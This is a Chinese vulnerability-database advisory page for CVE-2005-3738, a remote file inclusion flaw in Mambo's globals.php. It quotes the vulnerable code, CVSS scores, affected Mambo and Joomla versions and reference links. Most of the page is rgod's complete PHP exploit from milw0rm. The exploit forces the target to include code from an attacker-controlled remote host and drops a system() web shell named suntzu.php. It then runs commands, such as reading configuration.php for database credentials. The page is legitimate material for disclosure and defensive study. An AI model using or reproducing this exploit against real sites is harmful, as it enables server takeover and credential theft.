CVE-2005-3738
CVSS2.6
发布时间 :2005-11-22 06:03:00
修订时间 :2011-03-07 21:27:03
NMCOES    

[原文]globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.


[CNNVD]Mambo globals.php远程文件包含漏洞(CNNVD-200511-354)

        Mambo是功能强大的免费开放源码内容管理系统。
        如果关闭了register_globals的话,则Mambo的globals.php中存在远程文件包含漏洞,成功利用这个漏洞的攻击者可以以Web server进程的权限执行任意远程PHP代码。
        在globals.php中:
        if (!ini_get('register_globals')) {
        while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
        while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value;
        foreach($_FILES as $key => $value){
        $GLOBALS[$key]=$_FILES[$key]['tmp_name'];
        foreach($value as $ext => $value2){
        $key2 = $key . '_' . $ext;
        $GLOBALS[$key2] = $value2;
        }
        }
        }
        mambo.php中保护实效:
        if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST,
        CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Global variable hack attempted.' );
        }
        if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST,
        CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Post variable hack attempted.' );
        }

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mambo:mambo_site_server:4.0.14
cpe:/a:mambo:mambo_site_server:4.0.10
cpe:/a:mambo:mambo_site_server:4.0.12_beta
cpe:/a:mambo:mambo_site_server:4.0.12
cpe:/a:mambo:mambo_site_server:4.0.11
cpe:/a:mambo:mambo_site_server:4.0.12_rc3
cpe:/a:mambo:mambo_site_server:4.0.12_rc2
cpe:/a:mambo:mambo_site_server:4.0
cpe:/a:mambo:mambo_site_server:4.0.12_rc1
cpe:/a:mambo:mambo_site_server:4.0.12_beta_2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3738
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3738
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-354
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2473
(UNKNOWN)  VUPEN  ADV-2005-2473
http://www.securityfocus.com/bid/15461
(UNKNOWN)  BID  15461
http://www.securityfocus.com/archive/1/417215
(UNKNOWN)  BUGTRAQ  20051118 Mambo 0day Exploit out in the wild - mambo/skype hacked
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html
(VENDOR_ADVISORY)  FULLDISC  20051116 mambo remote code sexecution
http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060308 RE: [Full-disclosure] PHP-based CMS mass-exploitation
http://www.securityfocus.com/archive/1/archive/1/426942/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 PHP-based CMS mass-exploitation
http://securitytracker.com/id?1015258
(UNKNOWN)  SECTRACK  1015258
http://secunia.com/advisories/17622
(UNKNOWN)  SECUNIA  17622
http://forum.mamboserver.com/showthread.php?t=66154
(UNKNOWN)  CONFIRM  http://forum.mamboserver.com/showthread.php?t=66154

- 漏洞信息

Mambo globals.php远程文件包含漏洞
低危 输入验证
2005-11-22 00:00:00 2005-11-23 00:00:00
远程  
        Mambo是功能强大的免费开放源码内容管理系统。
        如果关闭了register_globals的话,则Mambo的globals.php中存在远程文件包含漏洞,成功利用这个漏洞的攻击者可以以Web server进程的权限执行任意远程PHP代码。
        在globals.php中:
        if (!ini_get('register_globals')) {
        while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
        while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value;
        foreach($_FILES as $key => $value){
        $GLOBALS[$key]=$_FILES[$key]['tmp_name'];
        foreach($value as $ext => $value2){
        $key2 = $key . '_' . $ext;
        $GLOBALS[$key2] = $value2;
        }
        }
        }
        mambo.php中保护实效:
        if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST,
        CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Global variable hack attempted.' );
        }
        if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST,
        CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Post variable hack attempted.' );
        }

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://mamboforge.net/

- 漏洞信息 (1337)

Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit (EDBID:1337)
php webapps
2005-11-22 Verified
0 rgod
N/A [点击下载]
<?php
#                                                                              #
#   ---mambo452_xpl.php                                 15.19 17/11/2005       #
#                                                                              #
#        Mambo <= 4.5.2 Globals overwrite / remote commands execution          #
#                              coded by rgod                                   #
#                    site: http://rgod.altervista.org                          #
#                                                                              #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu: "Rapidity is the essence of war:  take advantage of the enemy's    #
#  unreadiness, make your way by unexpected routes, and attack unguarded       #
#  spots."                                                                     #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ********* Mambo <= 4.5.2 remote commands xctn *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********** Mambo <= 4.5.2 remote commands xctn **********</p><p class="Stile6">a
script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form
name="form1" method="post"   action="'.$SERVER[PHP_SELF].'">           <p><input
type="text"  name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/mambo/  or just / ) </span></p><p><input type="text" name="command">      <span
class="Stile5"> * specify a command , "cat configuration.php" to see    database
username & password </span></p> <p><input type="text" name="location">     <span
class="Stile5"> * remote location ( ex: http://www.somesite.com) </span>    </p>
<p> <input type="text" name="port"><span class="Stile5">specify  a  port   other
than  80 ( default  value ) </span></p> <p>  <input  type="text"   name="proxy">
<span class="Stile5">  send  exploit through an  HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';


function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
		              //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                   }
	      else
 		  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
		   {
		     $result = socket_connect($socket, $host, $port);
		   }
		   else
		   {

		   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
		   $result = socket_connect($socket, $parts[0],$parts[1]);
		   }
		   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
	                       else
		                    {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

				    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
			die; }
      }
             else
           {
	   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
	   $parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $ock=fsockopen($parts[0],$parts[1]);
	    if (!$ock) { echo 'No response from proxy...';
			die;
		       }
	   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];$command=$_POST[command];
$proxy=$_POST[proxy];$location=$_POST[location];$port=$_POST[port];


if (($host<>'') and ($path<>'') and ($command<>'') and ($location<>''))
{

$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

$packet="GET ".$p."index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=".urlencode($location)." HTTP/1.1\r\n";
$packet.="User-Agent: NeuralBot/0.2\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

$packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: S.T.A.L.K.E.R.\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master",$html)) {echo "Exploit succeeded...";}
                         else {echo "Exploit failed...";}

}
else
{
  echo "Note: on remote location you need this code in <br>
        http:/[location]/includes/HTML_toolbar.php/index.html :<br>";
  echo  nl2br(htmlentities("
        <?php
        \$fp=fopen(\"suntzu.php\",\"w\");
        fputs(\$fp,\"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>\");
        fclose(\$fp);
        ?>
        "));
  echo "<br>Fill * requested fields, optionally specify a proxy...";
}
?>

# milw0rm.com [2005-11-22]
		

- 漏洞信息

20915
Mambo register_globals Emulation Layer Overwrite File Inclusion
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-16 Unknow
2005-11-24 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Mambo Open Source Remote File Include Vulnerability
Input Validation Error 15461
Yes No
2005-11-16 12:00:00 2005-11-16 12:00:00
peter MC tachatte <slythers@gmail.com> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Mambo Mambo Site Server 4.0.14
Mambo Mambo Site Server 4.0.12 RC3
Mambo Mambo Site Server 4.0.12 RC2
Mambo Mambo Site Server 4.0.12 RC1
Mambo Mambo Site Server 4.0.12 BETA 2
Mambo Mambo Site Server 4.0.12 BETA
Mambo Mambo Site Server 4.0.12
Mambo Mambo Site Server 4.0.11
Mambo Mambo Site Server 4.0.10
Mambo Mambo Site Server 4.0
Joomla Joomla 1.0.3
Joomla Joomla 1.0.2
Joomla Joomla 1.0.1
Joomla Joomla 1.0
Mambo Mambo Open Source 4.5.2 .3
Joomla Joomla 1.0.4

- 不受影响的程序版本

Mambo Mambo Open Source 4.5.2 .3
Joomla Joomla 1.0.4

- 漏洞讨论

Mambo is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Update: Reportedly, this issue is being actively exploited in the wild; multiple Web sites have been defaced, and the issue described in this BID is being cited as the attackers method of entry.

Update 12/5/2005 - Reports indicate that a bot is propagating in the wild by exploiting this vulnerability.

- 漏洞利用

An exploit is not required.

- 解决方案

The vendor has released a patch addressing this issue. Users are advised to contact the vendor for more information on obtaining the appropriate patch.

Joomla has released version 1.0.4 to address this, and other issues. Joomla is a fork of Mambo, and is susceptible to this issue.


Joomla Joomla 1.0

Joomla Joomla 1.0.1

Joomla Joomla 1.0.2

Joomla Joomla 1.0.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站